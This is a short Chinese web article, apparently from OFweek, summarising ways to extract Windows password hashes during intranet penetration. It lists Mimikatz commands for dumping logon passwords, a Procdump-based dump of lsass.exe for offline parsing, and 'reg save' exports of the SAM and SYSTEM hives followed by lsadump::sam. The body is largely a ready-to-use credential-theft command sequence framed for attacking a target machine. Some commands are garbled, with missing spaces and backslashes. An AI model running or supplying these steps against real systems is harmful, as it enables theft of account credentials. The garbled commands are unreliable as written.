內(nèi)網(wǎng)滲透—獲取Windows內(nèi)Hash密碼方法總結(jié)
1、直接讀取
Mimikatz讀取明文密碼和hash時(shí)需要管理員權(quán)限。
privilege::debug //提升至debug權(quán)限
sekurlsa::logonpasswords //抓取密碼
2、Procdump+Mimikatz離線(xiàn)讀取lsass.dmp文件
Procdump是微軟官方發(fā)布的工具,可以用來(lái)將目標(biāo)lsass文件導(dǎo)出。先在目標(biāo)機(jī)器上上傳Procdump,導(dǎo)出lsass.dmp
procdump64.exe-accepteula-ma
lsass.exe lsass.dmp
將目標(biāo)機(jī)上的lsass.dmp下載到本地后,執(zhí)行Mimikatz導(dǎo)出lsass.dmp里面的密碼和hash:
sekurlsa::minidump 目錄lsass.dmp //將導(dǎo)出的lsass.dmp載入到Mimikatz中
sekurlsa::logonpasswords full //獲取密碼
3、通過(guò)SAM和System文件抓取密碼和Hash
首先利用注冊(cè)表命令將目標(biāo)機(jī)的sam或者system文件導(dǎo)出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后將目標(biāo)機(jī)上的sam.hive和system.hive下載到本地,利用Mimikatz讀取sam和system文件獲取NTLMHash:
token::elevate
lsadump::sam

發(fā)表評(píng)論
登錄
手機(jī)
驗(yàn)證碼
立即登錄即可訪(fǎng)問(wèn)所有OFweek服務(wù)
還不是會(huì)員?免費(fèi)注冊(cè)
忘記密碼請(qǐng)輸入評(píng)論內(nèi)容...
請(qǐng)輸入評(píng)論/評(píng)論長(zhǎng)度6~500個(gè)字
圖片新聞
- 嬰兒看護(hù)攝像頭市場(chǎng)的品牌競(jìng)爭(zhēng)、產(chǎn)品演化以及全球容量
- 智能門(mén)鎖線(xiàn)上均價(jià)跌破900元;千元以下占七成銷(xiāo)量,新品牌占比高達(dá)21%
- 宇瞳光學(xué),10億如何撬動(dòng)千億級(jí)“眼球經(jīng)濟(jì)”?
- 當(dāng)自動(dòng)駕駛遇上黑客:你的智能座駕可能是個(gè) “漏洞富翁”?智能駕駛汽車(chē)如何避免網(wǎng)絡(luò)攻擊?
- 半年報(bào) | 2025H1中國(guó)智能門(mén)鎖銷(xiāo)量增長(zhǎng)6.8%,C端比重近六成
最新活動(dòng)更多
-
9月25日立即報(bào)名>> 【在線(xiàn)研討會(huì)】多通道相參信號(hào)的實(shí)現(xiàn)與應(yīng)用
-
精彩回顧立即查看>> 7月30日- 8月1日 2025全數(shù)會(huì)工業(yè)芯片與傳感儀表展
-
精彩回顧立即查看>> 【線(xiàn)下會(huì)議】OFweek 2024(第九屆)物聯(lián)網(wǎng)產(chǎn)業(yè)大會(huì)
-
精彩回顧立即查看>> 松下新能源中國(guó)布局:鋰一次電池新品介紹
-
精彩回顧立即查看>> 2024 智能家居出海論壇
-
精彩回顧立即查看>> 2024中國(guó)國(guó)際工業(yè)博覽會(huì)維科網(wǎng)·激光VIP企業(yè)展臺(tái)直播
編輯推薦